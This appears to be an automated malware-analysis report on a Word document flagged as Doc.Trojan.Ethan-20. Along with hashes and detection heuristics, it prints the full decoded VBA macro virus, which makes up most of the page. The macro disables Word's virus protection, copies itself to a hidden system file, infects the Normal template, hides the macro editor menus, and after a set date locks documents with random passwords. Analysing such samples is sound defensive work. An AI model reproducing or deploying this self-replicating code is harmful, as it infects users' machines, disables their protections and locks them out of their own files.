Office (OLE) malware analysis — malicious · b383465085ec1f76

MALICIOUS

Office (OLE)

30.0 KB Created: 2001-02-06 12:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 44a0044b6e68c321e1dda3737e1b5049 SHA-1: 21d5488ba3892a53c85915aa71e6dd382e13f838 SHA-256: b383465085ec1f769417ec5bcc010c444b28bfc8aa0e14cdb5ca699036e81500

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro that executes upon opening. The macro attempts to write its own code to 'c:\windows\system\vmm32\NVMB.vxd', suggesting an attempt to establish persistence or deploy a secondary payload. The ClamAV detection 'Doc.Trojan.Ethan-20' further supports its malicious nature.

Heuristics 3

ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ethan-20
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11998 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11998 bytes
SHA-256: `0008dc71df3fb9f079e7066e70bc5f6c14ded9061a8213afd87204aae552cd32`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() On Error Resume Next sss = "Private Sub Document_Close()" Application.EnableCancelKey = Not -1 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: .BackgroundSave = True: End With ActiveDocument.SaveAs FileName:=ActiveDocument.FullName Randomize If Dir("c:\windows\system\vmm32\NVMB.vxd", 6) = "" Then Open "c:\windows\system\vmm32\NVMB.vxd" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Print #1, a Next i Close #1 SetAttr "c:\windows\system\vmm32\NVMB.vxd", 6 End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> sss Then Set t = NormalTemplate.VBProject.VBComponents.Item(1) Else If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> sss Then Set t = ActiveDocument.VBProject.VBComponents.Item(1) Else t = "" End If End If If t <> "" Then Open "c:\windows\system\vmm32\NVMB.vxd" For Input As #1 If LOF(1) = 0 Then GoTo q i = 1 Do While Not EOF(1) Line Input #1, a t.CodeModule.InsertLines i, a i = i + 1 Loop q: Close #1 End If If Application.UserName = "ÍĎ ŃĎŃ" Or Application.UserName = "Ôčëčďďĺíęî" Then Else Set myDoc = ActiveDocument If Month(Now()) >= 11 And Day(Now()) > 5 Then With Application.ActiveWindow.Document.Words.Item(25) .Text = Chr(13) + " With New Year N V M B !!! " + Chr(13) .Select .Font.Name = "Tahoma" .Font.Size = 16 .Font.Animation = wdAnimationLasVegasLights End With If Left(ActiveDocument.Name, 3) <> "DMB" Then i = Int((60 * Rnd) + 1) pass = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Count = Int((10 * Rnd) + 1) pass = Left(pass, Count) Open "c:\pass.sys" For Append As #1 Print #1, ActiveDocument.Name Print #1, pass Close #1 myDoc.WritePassword = pass With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: .BackgroundSave = True: End With End If End If End If With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: .BackgroundSave = True: End With End Sub Private Sub Document_Open() On Error Resume Next With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: .BackgroundSave = True: End With Dim ee As CommandBarPopup Set ee = Application.CommandBars("Menu Bar").Controls("&Ńĺđâčń") ee.CommandBar.Controls("&Ěŕęđîń").Enabled = True Dim S1 As CommandBarPopup Set S1 = ee.CommandBar.Controls("&Ěŕęđîń") For q = 1 To S1.Controls.Count If S1.CommandBar.Controls.Item(q).Caption = "&Đĺäŕęňîđ Visual Basic" Or S1.CommandBar.Controls.Item(q).Caption = "&Íŕ÷ŕňü çŕďčńü..." Or S1.CommandBar.Controls.Item(q).Caption = "&Ěŕęđîńű..." Then S1.CommandBar.Controls.Item(q).Visible = False S1.CommandBar.Controls.Item(q).Enabled = False End If Next q End Sub ' Processing file: /opt/analyzer/scan_staging/a8b47ac539ae46a2a42ae3f4e02aed0b.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 5548 bytes ' Line #0: ' FuncDefn (Private Sub Document_Close()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' LitStr 0x001C "Private Sub Document_Close()" ' St sss ' Line #3: ' LitDI2 0x0001 ' UMi ' Not ' Ld Application ' MemSt EnableCancelKey ' Line #4: ' StartWithExpr ' Ld Options ' With ' BoS 0x0000 ' LitDI2 0x0000 ' MemStWith ConfirmConversions ' BoS 0x0000 ' LitDI2 0x0000 ' MemStWith VirusProtection ' BoS 0x0000 ' LitDI2 0x0000 ' MemStWith SaveNormalPrompt ' BoS 0x0055 ' LitVarSpecial (True) ' MemStWith BackgroundSave ' BoS 0x0000 ' EndWith ' ... (truncated)

SHA-256: 0008dc71df3fb9f079e7066e70bc5f6c14ded9061a8213afd87204aae552cd32

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
sss = "Private Sub Document_Close()"
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True: End With
 ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
Randomize
If Dir("c:\windows\system\vmm32\NVMB.vxd", 6) = "" Then
Open "c:\windows\system\vmm32\NVMB.vxd" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\windows\system\vmm32\NVMB.vxd", 6
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> sss Then
    Set t = NormalTemplate.VBProject.VBComponents.Item(1)
Else
If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> sss Then
    Set t = ActiveDocument.VBProject.VBComponents.Item(1)
  Else
    t = ""
End If
End If
If t <> "" Then
Open "c:\windows\system\vmm32\NVMB.vxd" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
End If
If Application.UserName = "ÍĎ ŃĎŃ" Or Application.UserName = "Ôčëčďďĺíęî" Then

Else
Set myDoc = ActiveDocument
If Month(Now()) >= 11 And Day(Now()) > 5 Then
   With Application.ActiveWindow.Document.Words.Item(25)
       .Text = Chr(13) + " With New Year   N V M B !!!  " + Chr(13)
       .Select
       .Font.Name = "Tahoma"
       .Font.Size = 16
       .Font.Animation = wdAnimationLasVegasLights
   End With
If Left(ActiveDocument.Name, 3) <> "DMB" Then
   i = Int((60 * Rnd) + 1)
   pass = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
   Count = Int((10 * Rnd) + 1)
   pass = Left(pass, Count)
   Open "c:\pass.sys" For Append As #1
   Print #1, ActiveDocument.Name
   Print #1, pass
   Close #1
   myDoc.WritePassword = pass
   With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True:  End With
End If
End If
End If
 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True:  End With
End Sub
Private Sub Document_Open()
On Error Resume Next
 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0:  .BackgroundSave = True:  End With
Dim ee As CommandBarPopup
Set ee = Application.CommandBars("Menu Bar").Controls("&Ńĺđâčń")
ee.CommandBar.Controls("&Ěŕęđîń").Enabled = True
Dim S1 As CommandBarPopup
Set S1 = ee.CommandBar.Controls("&Ěŕęđîń")
For q = 1 To S1.Controls.Count
   If S1.CommandBar.Controls.Item(q).Caption = "&Đĺäŕęňîđ Visual Basic" Or S1.CommandBar.Controls.Item(q).Caption = "&Íŕ÷ŕňü çŕďčńü..." Or S1.CommandBar.Controls.Item(q).Caption = "&Ěŕęđîńű..." Then
      S1.CommandBar.Controls.Item(q).Visible = False
      S1.CommandBar.Controls.Item(q).Enabled = False
   End If
Next q
End Sub


' Processing file: /opt/analyzer/scan_staging/a8b47ac539ae46a2a42ae3f4e02aed0b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5548 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	St sss 
' Line #3:
' 	LitDI2 0x0001 
' 	UMi 
' 	Not 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #4:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith ConfirmConversions 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith VirusProtection 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	MemStWith SaveNormalPrompt 
' 	BoS 0x0055 
' 	LitVarSpecial (True)
' 	MemStWith BackgroundSave 
' 	BoS 0x0000 
' 	EndWith 
'
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.